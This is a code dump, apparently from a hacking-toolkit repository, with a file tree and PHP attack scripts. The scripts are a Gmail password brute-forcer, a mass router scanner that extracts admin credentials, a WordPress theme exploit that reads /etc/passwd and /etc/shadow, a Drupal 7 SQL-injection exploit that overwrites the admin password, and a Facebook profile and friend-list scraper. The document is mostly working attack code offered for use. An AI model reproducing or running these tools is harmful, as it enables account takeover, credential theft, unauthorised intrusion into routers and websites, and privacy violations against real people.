404 not found

├── INSTALL.sh ├── INURLBR ├── GMAIL_BRUTE_FORCE.php ├── RouterHunterBR.php ├── exploit.php ├── exploitDrupal7.php ├── face.php ├── inurlbr.php ├── md5.php └── readme.txt ├── README.md ├── files ├── DLINK │ ├── img_wireless_bottom.gif │ ├── index.html │ ├── login.html │ ├── logo.gif │ ├── md5.js │ ├── substyle_DIR-615.css │ ├── ubicom.js │ └── xml_data.js ├── Login_files │ ├── banner_left.gif │ ├── index.html │ ├── login.html │ ├── spacer.gif │ ├── styles.css │ └── user__xl.gif ├── ROUTERS_DEFAULT │ ├── index.html │ └── login.html ├── eu.jpg ├── javaBanner.jpg ├── list.txt └── post-modules.txt ├── license ├── logs └── .log ├── modules ├── Intro.nt ├── Post-auto.rc ├── adobe_flash_hacking_team_uaf.rb ├── changelog.nt ├── cupp.py ├── database.db ├── exec.c ├── msf.swf ├── my-auxiliary.rb ├── priv8.sh ├── samsung_reset.py ├── unicorn.py ├── update.txt ├── web_delivery.bat └── web_delivery.py ├── netool.sh ├── priv8 ├── .set └── handler │ └── .set ├── shellter ├── faq.txt ├── icon │ └── shellter.ico ├── license.txt ├── readme.txt ├── shellcode_samples │ ├── calc │ ├── calcenc │ ├── info.txt │ ├── krb1 │ └── krb3 ├── shellter.exe └── version_history.txt ├── sslstrip-0.9 ├── COPYING ├── README ├── lock.ico ├── setup.py ├── sslstrip.py └── sslstrip │ ├── ClientRequest.py │ ├── ClientRequest.pyc │ ├── CookieCleaner.py │ ├── CookieCleaner.pyc │ ├── DnsCache.py │ ├── DnsCache.pyc │ ├── SSLServerConnection.py │ ├── SSLServerConnection.pyc │ ├── ServerConnection.py │ ├── ServerConnection.pyc │ ├── ServerConnectionFactory.py │ ├── ServerConnectionFactory.pyc │ ├── StrippingProxy.py │ ├── StrippingProxy.pyc │ ├── URLMonitor.py │ ├── URLMonitor.pyc │ ├── __init__.py │ └── __init__.pyc ├── templates ├── WinSCP.exe ├── flashplayer.exe ├── procexp.exe ├── procexp.sfx.exe ├── putty.exe └── template.pdf └── toolkit_config /INURLBR/GMAIL_BRUTE_FORCE.php: -------------------------------------------------------------------------------- 1 | Gmail Brute Force Attacker 20 | 21 | 37 | 38 | 39 | 40 | 43 | 44 |

41 |

Gmail Brute Force Attacker

42 |

45 | 46 | 47 | 52 | 53 | 54 | 59 | 60 | 61 | 70 | 71 | 72 | 77 | 78 |

48 |

49 | 50 |

51 |

55 |

56 | 57 |

58 |

62 |

63 | 68 |

69 |

73 |

74 | 75 |

76 |

79 | "; 80 | // Sets variables and retrives google error for comparing 81 | if(isset($_POST['attack']) && isset($_POST['username'])) { 82 | $username = $_POST['username']; 83 | $headers = array( 84 | "Host: mail.google.com", 85 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", 86 | "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", 87 | "Accept-Language: en-us,en;q=0.5", 88 | "Accept-Encoding: text", # No gzip, it only clutters your code! 89 | "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", 90 | "Date: ".date(DATE_RFC822) 91 | ); 92 | $c = curl_init('https://mail.google.com/mail/feed/atom'); 93 | curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication 94 | curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers 95 | curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! 96 | curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow 97 | curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); 98 | curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); 99 | curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised 100 | $wrong = curl_exec($c); // Get it 101 | curl_close($c); // Close the curl stream 102 | } 103 | //Dictionary Attack 104 | if($_POST['attack'] == "dictionary") { 105 | $Dictionary = file("$dic"); 106 | for ($Position = 0; $Position < count($Dictionary); $Position++) { 107 | $Dictionary[$Position] = str_replace("rn", "", $Dictionary[$Position]); 108 | if(check_correct($username, $Dictionary[$Position])) { 109 | die(" 110 | 111 | 114 | 115 |

112 |

Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."

113 |

116 | 117 | "); 118 | } 119 | } 120 | echo " 121 | 122 | 126 | 127 |

123 |

Sorry... a password was not found for the account of ".$username." during the dictionar 124 | y attack.

125 |

"; 128 | } 129 | //Brute Attack 130 | elseif($_POST['attack'] == "brute") { 131 | for ($Pass = 0; $Pass < 2; $Pass++) { 132 | if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } 133 | if(check_correct($username, $Pass)) { 134 | die(" 135 | 136 | 139 | 140 |

137 |

Found the password of: ".$Dictionary[$Position]."
For the account: ".$username."

138 |

141 | 142 | "); 143 | } 144 | } 145 | echo " 146 | 147 | 151 | 152 |

148 |

Sorry... a password was not found for the account of ".$username." during the brute for 149 | ce attack.

150 |

"; 153 | } 154 | echo " 155 | "; 156 | // Function for checking whether the username and password are correct 157 | function check_correct($username, $password) 158 | { 159 | global $wrong, $headers; 160 | $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); 161 | curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication 162 | curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers 163 | curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! 164 | curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow 165 | curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); 166 | curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); 167 | curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised 168 | $str = curl_exec($c); // Get it 169 | curl_close($c); 170 | if($str != $wrong) {return true;} 171 | else {return false;} 172 | } 173 | 174 | ?> 175 | -------------------------------------------------------------------------------- /INURLBR/RouterHunterBR.php: -------------------------------------------------------------------------------- 1 | (.*?)<\/name>/i'; 128 | $set['reg2'] = '/(.*?)<\/pw>/i'; 129 | 130 | if (not_isnull_empty($html) && preg_match($set['reg1'], $html) && preg_match($set['reg2'], $html)) { 131 | 132 | preg_match_all($set['reg1'], $html, $set['user']); 133 | preg_match_all($set['reg2'], $html, $set['pass']); 134 | 135 | for ($i = 0; $i <= count($set['user']); $i++) { 136 | 137 | $set['out'].= "USER: {$set['user'][1][$i]} | PW: {$set['pass'][1][$i]}\n"; 138 | } 139 | return $set['out']; 140 | } 141 | 142 | return FALSE; 143 | } 144 | 145 | //INFORMATION IP 146 | function __infoIP($ip) { 147 | __plus(); 148 | $return = json_decode(file_get_contents("http://www.telize.com/geoip/{$ip}"), TRUE); 149 | return "{$return['city']} /{$return['country']} - {$return['country_code']} /{$return['continent_code']} , ISP: {$return['isp']}"; 150 | } 151 | 152 | //VALIDATION VARIABLE 153 | function not_isnull_empty($value = NULL) { 154 | 155 | RETURN !is_null($value) && !empty($value) ? TRUE : FALSE; 156 | } 157 | 158 | //MENU BANNER 159 | function __banner($msg, $op = NULL) { 160 | 161 | system("command clear"); 162 | print_r(" 163 | \n{$_SESSION["c01"]} _____ 164 | {$_SESSION["c01"]} (_____) 165 | {$_SESSION["c01"]} ({$_SESSION["c13"]}() (){$_SESSION["c01"]}) 166 | {$_SESSION["c01"]} \ / 167 | {$_SESSION["c01"]} \ / 168 | {$_SESSION["c01"]} /=\ 169 | {$_SESSION["c01"]} [___] / script exploit developed by INURL - BRAZIL - [ SCANNER RouterHunterBR 1.0 ] 170 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Cleiton Pinheiro / NICK: GoogleINURL 171 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}AUTOR: Jhonathan davi / NICK: Jhoon 172 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}EMAIL: inurllbr@gmail.com 173 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Blog: http://blog.inurl.com.br 174 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Twitter: https://twitter.com/googleinurl 175 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}Fanpage: https://fb.com/InurlBrasil 176 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}GIT: https://github.com/googleinurl 177 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PASTEBIN: http://pastebin.com/u/googleinurl 178 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA 179 | {$_SESSION["c01"]}0x__[{$_SESSION["c13"]}PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl 180 | 181 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Simple search: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt 182 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set IPS random: php RouterHunterBR.php --rand --limit-ip 200 --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt 183 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set source file: php RouterHunterBR.php --file ips.txt --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt 184 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Set proxy: php RouterHunterBR.php --range '177.100.255.1-20' --dns1 8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118' 185 | {$_SESSION["c01"]}[?]__[{$_SESSION["c13"]}Proxy format: 186 | --proxy 'localhost:8118' 187 | --proxy 'socks5://googleinurl@localhost:9050' 188 | --proxy 'http://admin:12334@172.16.0.90:8080' 189 | \n{$_SESSION["c01"]}{$msg}{$_SESSION["c00"]}\n"); 190 | (is_null($op)) ? exit() : NULL; 191 | } 192 | 193 | //CREATING FORMATTING IPS FOR BAND 194 | function __getRange($range) { 195 | 196 | $ip = explode('.', $range); 197 | if (is_array($ip) && count($ip) == 4) { 198 | 199 | $ip[0] = (strstr($ip[0], '-')) ? explode('-', $ip[0]) : explode('-', "{$ip[0]}-{$ip[0]}"); 200 | $ip[1] = (strstr($ip[1], '-')) ? explode('-', $ip[1]) : explode('-', "{$ip[1]}-{$ip[1]}"); 201 | $ip[2] = (strstr($ip[2], '-')) ? explode('-', $ip[2]) : explode('-', "{$ip[2]}-{$ip[2]}"); 202 | $ip[3] = (strstr($ip[3], '-')) ? explode('-', $ip[3]) : explode('-', "{$ip[3]}-{$ip[3]}"); 203 | return $ip; 204 | } else { 205 | return FALSE; 206 | } 207 | } 208 | 209 | //GENERATING IPS RANDOM 210 | function __getIPRandom() { 211 | 212 | $bloc1 = rand(0, 255); 213 | $bloc2 = rand(0, 255); 214 | $bloc3 = rand(0, 255); 215 | $bloc4 = rand(0, 255); 216 | $ip = "{$bloc1}.{$bloc2}.{$bloc3}.{$bloc4}"; 217 | return $ip; 218 | } 219 | 220 | //OPENING FILE FILE IPS 221 | function __getIPFile($file) { 222 | 223 | if (isset($file) && !empty($file)) { 224 | 225 | $resultIP = array_unique(array_filter(explode("\n", file_get_contents($file)))); 226 | __plus(); 227 | if (is_array($resultIP)) { 228 | 229 | return ($resultIP); 230 | } 231 | } 232 | return FALSE; 233 | } 234 | 235 | //AGENT REQUEST RANDOM 236 | function __getUserAgentRandom() { 237 | 238 | //AGENT BROSER 239 | $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox', 240 | 'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror' 241 | ); 242 | //AGENT OPERATING SYSTEM 243 | $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD', 244 | 'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix', 245 | 'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android' 246 | ); 247 | //AGENT LOCAL FAKE 248 | $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO', 249 | 'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar', 250 | 'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK' 251 | ); 252 | return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)'; 253 | } 254 | 255 | //SEND REQUEST SERVER 256 | function __request($params) { 257 | 258 | $objcurl = curl_init(); 259 | $status = array(); 260 | curl_setopt($objcurl, CURLOPT_URL, "http://{$params['host']}{$params['exploit']}"); 261 | (!is_null($params['proxy']) ? curl_setopt($objcurl, CURLOPT_PROXY, $params['proxy']) : NULL); 262 | curl_setopt($objcurl, CURLOPT_USERAGENT, __getUserAgentRandom()); 263 | curl_setopt($objcurl, CURLOPT_REFERER, $params['host']); 264 | curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); 265 | curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 1); 266 | curl_setopt($objcurl, CURLOPT_HEADER, 1); 267 | curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); 268 | 269 | $info['corpo'] = curl_exec($objcurl); 270 | __plus(); 271 | 272 | $server = curl_getinfo($objcurl); 273 | 274 | __plus(); 275 | 276 | //FILTERING SERVER INFORMATION 277 | preg_match_all('(HTTP.*)', $info['corpo'], $status['http']); 278 | preg_match_all('(Server:.*)', $info['corpo'], $status['server']); 279 | preg_match_all('(X-Powered-By:.*)', $info['corpo'], $status['X-Powered-By']); 280 | 281 | $info['dados_01'] = $server; 282 | $info['dados_02'] = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]} {$status['X-Powered-By'][0][0]}")); 283 | 284 | curl_close($objcurl); 285 | __plus(); 286 | return $info; 287 | } 288 | 289 | //SUB PROCESS 290 | function __subProcess($params, $target) { 291 | 292 | foreach ($params['exploit_model'] as $camp => $value) { 293 | 294 | $params['exploit'] = $value; 295 | $params['exploit_model'] = $camp; 296 | $params['host'] = $target; 297 | $rest = __request($params); 298 | 299 | __plus(); 300 | 301 | if ($rest['dados_01']['http_code'] != 0) { 302 | break; 303 | } 304 | } 305 | __plus(); 306 | $_SESSION["cont_ip"] ++; 307 | if ($rest['dados_01']['http_code'] == 200) { 308 | 309 | //FOUND FILE 310 | $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}"; 311 | echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; 312 | $output_view = "{$style_var} [ ! ]__[INFO][COD]: {$rest['dados_01']['http_code']}\n"; 313 | $output_view .= "{$style_var} [ ! ]__[INFO][IP/FILE]: {$params['host']}{$params['exploit']}\n"; 314 | $output_view .= "{$style_var} [ ! ]__[INFO][MODEL]: {$params['exploit_model']}\n"; 315 | $output_view .= "{$style_var} [ ! ]__[INFO][DETAILS_1]: {$rest['dados_02']}\n{$_SESSION["c00"]}"; 316 | $info_ip = __infoIP($rest['dados_01']['primary_ip']); 317 | $output_view .= "{$style_var} [ ! ]__[INFO][DETAILS_2]: {$info_ip}\n{$_SESSION["c00"]}"; 318 | echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"]; 319 | 320 | $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}"; 321 | file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND); 322 | 323 | __plus(); 324 | } else { 325 | 326 | //FILE NOT FOUND 327 | echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n"; 328 | echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}"; 329 | } 330 | 331 | echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"]; 332 | } 333 | 334 | function main($params) { 335 | 336 | //IMPLEMENTATION HOME 337 | echo __banner("{$_SESSION["c13"]}{$params['line']}\n{$_SESSION["c00"]}", 1); 338 | if ($params['op'] == 0) { 339 | 340 | //WORKING WITH IPS ON TRACK 341 | for ($i = $params['range'][0][0]; $i < $params['range'][0][1]; $i++) { 342 | 343 | __plus(); 344 | __subProcess($params, "{$i}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$params['range'][3][0]}"); 345 | __plus(); 346 | } 347 | 348 | for ($i = $params['range'][1][0]; $i < $params['range'][1][1]; $i++) { 349 | 350 | __plus(); 351 | __subProcess($params, "{$params['range'][0][0]}.{$i}.{$params['range'][2][0]}.{$params['range'][3][0]}"); 352 | __plus(); 353 | } 354 | 355 | for ($i = $params['range'][2][0]; $i < $params['range'][2][1]; $i++) { 356 | 357 | __plus(); 358 | __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$i}.{$params['range'][3][0]}"); 359 | __plus(); 360 | } 361 | 362 | for ($i = $params['range'][3][0]; $i < $params['range'][3][1]; $i++) { 363 | 364 | __plus(); 365 | __subProcess($params, "{$params['range'][0][0]}.{$params['range'][1][0]}.{$params['range'][2][0]}.{$i}"); 366 | __plus(); 367 | } 368 | } elseif ($params['op'] == 1) { 369 | 370 | //WORKING WITH IP RANDOM 371 | !not_isnull_empty($params['limit-ip']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SET NUMBER OF IPS\n{$_SESSION["c00"]}") : NULL; 372 | for ($i = 0; $i <= $params['limit-ip']; $i++) { 373 | 374 | __subProcess($params, __getIPRandom()); 375 | __plus(); 376 | } 377 | } elseif ($params['op'] == 2) { 378 | 379 | //IP WORK SOURCE FILE 380 | !is_array($params['file']) ? __banner("{$_SESSION["c01"]}0x__[{$_SESSION["c02"]}SOMETHING WRONG WITH YOUR FILE\n{$_SESSION["c00"]}") : NULL; 381 | __plus(); 382 | foreach ($params['file'] as $value) { 383 | __subProcess($params, $value); 384 | __plus(); 385 | } 386 | } 387 | } 388 | 389 | //RUNNING ALL PROCESS 390 | main($params); 391 | -------------------------------------------------------------------------------- /INURLBR/exploit.php: -------------------------------------------------------------------------------- 1 | $valor) { 60 | $postDados_format .= $campo . '=' . ($valor) . '&'; 61 | } 62 | 63 | $postDados_format = rtrim($postDados_format, '&'); 64 | curl_setopt($curl, CURLOPT_POST, count($postDados)); 65 | curl_setopt($curl, CURLOPT_POSTFIELDS, $postDados_format); 66 | curl_setopt($curl, CURLOPT_URL, $config['alvo'] . $config['exploit']); 67 | curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/' . rand(1, 20) . '.0(X11; Linux x8' . rand(1, 20) . '_6' . rand(1, 20) . ') blog.inurl.com.br/'. md5(rand(1, 200)) . '.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/'. rand(1, 500) . '.31'); 68 | curl_setopt($curl, CURLOPT_REFERER, $config['alvo'] . 69 | $config['exploit']); 70 | curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); 71 | curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20); 72 | curl_setopt($curl, CURLOPT_HEADER, 1); 73 | curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 74 | $corpo = curl_exec($curl); 75 | $server = curl_getinfo($curl); 76 | $status = NULL; 77 | preg_match_all('(HTTP.*)', $corpo, $status['http']); 78 | preg_match_all('(Server:.*)', $corpo, $status['server']); 79 | preg_match_all('(Content-Disposition:.*)', $corpo, $status['Content-Disposition']); 80 | $info = str_replace("\r", '', str_replace("\n", '', "{$status['http'][0][0]}, {$status['server'][0][0]}{$status['Content-Disposition'][0][0]}")); 81 | curl_close($curl); 82 | unset($curl); 83 | return isset($corpo) ? array('corpo' => $corpo, 'server' => $server,'info' => $info) : FALSE; 84 | } 85 | 86 | function main($config, $rest) { 87 | 88 | __plus(); 89 | print " |[INFO][EXPLOITATION THE FILE]:{$config['file']}:\n"; 90 | preg_match_all("(root:.*)", $rest['corpo'], $final); 91 | preg_match_all("(sbin:.*)", $rest['corpo'], $final__); 92 | preg_match_all("(ftp:.*)", $rest['corpo'], $final___); 93 | preg_match_all("(nobody:.*)", $rest['corpo'], $final____); 94 | preg_match_all("(mail:.*)", $rest['corpo'], $final_____); 95 | $_final = array_merge($final[0], $final__[0], $final___[0], $final____[0], $final_____[0]); 96 | $res = NULL; 97 | if (preg_match("#root#i", $rest['corpo'])) { 98 | $res.= " |[INFO][IS VULN][RESUME][VALUES]:\n"; 99 | $res.=$config['line']; 100 | foreach ($_final as $value) { 101 | $res.=" |[VALUE]: $value\n"; 102 | } 103 | $res.=$config['line']; 104 | __plus(); 105 | file_put_contents('EXPLOIT_WPAFD_Echelon.txt', "{$config['alvo']}\n{$res}\n", FILE_APPEND); 106 | print "{$res} |[VALUES SAVED]: EXPLOIT_WPAFD_Echelon.txt\n\n"; 107 | } else { 108 | 109 | print " |[INFO][NOT VULN]\n"; 110 | } 111 | } 112 | 113 | print "\r |[EXPLOIT NAME]: Wordpress A.F.D Theme Echelon / INURL - BRASIL\n"; 114 | $config['file'] = '/etc/passwd'; 115 | $rest = __request_info($objcurl = curl_init(), $config); 116 | __plus(); 117 | print $line; 118 | print " |[INFO]: {$rest['info']}\n"; 119 | print " |[INFO][TARGET]: {$config['alvo']}\n"; 120 | main($config, $rest); 121 | __plus(); 122 | $config['file'] = '/etc/shadow'; 123 | $rest = __request_info($objcurl = curl_init(), $config); 124 | __plus(); 125 | main($config, $rest); 126 | __plus(); 127 | -------------------------------------------------------------------------------- /INURLBR/exploitDrupal7.php: -------------------------------------------------------------------------------- 1 | '; 41 | 42 | $params['url'] = isset($argv[1]) && !empty($argv[1]) ? $argv[1] : exit("SET TARGET URL ex: php exploitDrupal7.php http://target.com save.txt"); 43 | $params['output'] = isset($argv[2]) && !empty($argv[2]) ? $argv[2] : 'OUTPUT_INURL_DRUPAL7.txt'; 44 | $params['post'] = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; 45 | $params['url_request'] = '?q=node&destination=node'; 46 | 47 | 48 | //EXEMPLE INJECTIONS - http://blog.sucuri.net/2014/10/drupal-sql-injection-attempts-in-the-wild.html 49 | //users passwords: 50 | $params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select+md5(1016)+from+users+limit+0,1)));%23%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; 51 | 52 | //select information_schema.tables: 53 | $params['post1'] = "name[0%20and%20extractvalue(1,concat(0x5c,(select md5(1122) from 54 | information_schema.tables limit 1)));%23%20%20]=removed&name[0]=removed&pass=removed& 55 | removed=removed&form_build_id=&form_id=user_login_block&op=Log+in"; 56 | 57 | function __request($params) { 58 | 59 | $objcurl = curl_init(); 60 | curl_setopt($objcurl, CURLOPT_URL, $params['url'] . $params['url_request']); 61 | curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); 62 | curl_setopt($objcurl, CURLOPT_HEADER, 1); 63 | curl_setopt($objcurl, CURLOPT_HTTPHEADER, array( 64 | 'Content-Type: application/x-www-form-urlencoded', 65 | 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 66 | 'Accept: application/json, text/javascript, */*; q=0.01', 67 | 'X-Requested-With: XMLHttpRequest', 68 | "Referer: {$params['url']}", 69 | 'Accept-Language: en-US,en;q=0.5', 70 | 'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;' 71 | )); 72 | curl_setopt($objcurl, CURLOPT_REFERER, $params['url'] . $params['url_request']); 73 | curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']); 74 | 75 | $corpo = curl_exec($objcurl); 76 | curl_close($objcurl); 77 | 78 | if (stristr($corpo, 'mb_strlen() expects parameter 1 to be string') && $corpo) { 79 | echo " |[INFO]: VULNERABLE! Log in with username: \"admin\" and password: \"admin\" at {$params['url']}/user/login \n"; 80 | echo " |[INFO][OUTPUT]: {$params['output']}\n"; 81 | $output = "\n"; 82 | $output.= " |[INFO][URL]: {$params['url']}/user/login\n"; 83 | $output.= " |[INFO][LOGIN]: admin / pass: admin\n"; 84 | $output.= " |[INFO][DATE]: " . date("d-m-Y H:i:s"); 85 | $output.= "\n\n"; 86 | echo $output; 87 | file_put_contents($params['output'], $output, FILE_APPEND); 88 | } else { 89 | echo " |[INFO]: NOT Vulnerable , or your Internet isn't working. \n\n"; 90 | } 91 | } 92 | 93 | //EXECUT... 94 | __request($params); 95 | -------------------------------------------------------------------------------- /INURLBR/face.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/php 2 | getName() => $array_); 51 | echo 52 | 53 | "\033[1;34m 54 | ================================================================================================================ 55 | DADOS FACEBOOK 56 | ================================================================================================================ 57 | \n"; 58 | echo "\033[1;37m0x\033[0m\033[02;31mLINK:: \033[1;37m" . (isset($_SESSION['config']['link']) ? $_SESSION['config']['link'] : NULL ) . "\n\n"; 59 | echo "\033[1;37m0x\033[0m\033[02;31mID:: \033[1;37m{$array['fql_query_response']['user']['uid']}\n\n"; 60 | echo "\033[1;37m0x\033[0m\033[02;31mUSERNAME:: \033[1;37m{$array['fql_query_response']['user']['username']}\n\n"; 61 | echo "\033[1;37m0x\033[0m\033[02;31mNOME:: \033[1;37m{$array['fql_query_response']['user']['name']}\n\n"; 62 | echo "\033[1;37m0x\033[0m\033[02;31mPRIMEIRO NOME:: \033[1;37m{$array['fql_query_response']['user']['first_name']}\n\n"; 63 | echo "\033[1;37m0x\033[0m\033[02;31mSOBRENOME:: \033[1;37m{$array['fql_query_response']['user']['last_name']}\n\n"; 64 | echo "\033[1;37m0x\033[0m\033[02;31mSEXO:: \033[1;37m{$array['fql_query_response']['user']['sex']}\n\n"; 65 | echo "\033[1;37m0x\033[0m\033[02;31mLOCAL:: \033[1;37m{$array['fql_query_response']['user']['locale']}\n\n"; 66 | echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO PEQUENA:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_small_with_logo']) . "\n\n"; 67 | echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO GRANDE:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_big_with_logo']) . "\n\n"; 68 | echo "\033[1;37m0x\033[0m\033[02;31mFOTO LOGO:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_square_with_logo']) . "\n\n"; 69 | echo "\033[1;37m0x\033[0m\033[02;31mFOTO:: \033[1;37m" . urldecode($array['fql_query_response']['user']['pic_with_logo']) . "\n\n\033[0m"; 70 | 71 | echo "http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1\n"; 72 | $_SESSION['config3'] = getHttpResponseCode("http://www.facebook.com/ajax/typeahead_friends.php?u={$_SESSION['config']['id']}&__a=1"); 73 | echo "================================================================================================================\n"; 74 | 75 | 76 | $cont = 0; 77 | $array2 = (explode('{"', $_SESSION['config3'])); 78 | foreach ($array2 as $valores) { 79 | $valores = str_replace('],"viewer_id":0},"bootloadable":{},"ixData":[]}', '', str_replace(',"n":"","it":null}', '', $valores)); 80 | $valores = str_replace('"u":', "\033[1;37mURL::\033[0m\033[1;34m", str_replace('t":', "\033[1;37mNOME::\033[0m\033[1;34m", str_replace('"i"', "\033[1;37mID::\033[0m\033[1;34m", str_replace('\/', '/', $valores)))); 81 | echo "\033[02;31m[\033[1;37m".$cont++."\033[02;31m]\033[0m - $valores\n"; 82 | } 83 | } else { 84 | 85 | echo menu() . " Falta definir parâmetro de busca, Exemplo=> php face.php usuario\n"; 86 | } 87 | 88 | function menu() { 89 | system("command clear"); 90 | return(" 91 | \033[1;37m _____ 92 | \033[1;37m(_____) 93 | \033[1;37m(\033[02;31m() ()\033[1;37m) 94 | \033[1;37m \ / 95 | \033[1;37m \ / 96 | \033[1;37m /=\ 97 | \033[1;37m [___] / Googleinurl - [ INURLBR API face ] 98 | \033[1;37m0xNeither war between hackers, nor peace for the system. 99 | \033[1;37m0x\033[0m\033[02;31mhttp://blog.inurl.com.br 100 | \033[1;37m0x\033[0m\033[02;31mhttps://fb.com/InurlBrasil 101 | \033[1;37m0x\033[0m\033[02;31mhttp://twitter.com/@googleinurl\033[0m 102 | [+] Pesquisa dados facebook, Ex: php face.php zuck 103 | "); 104 | } 105 | -------------------------------------------------------------------------------- /INURLBR/md5.php: 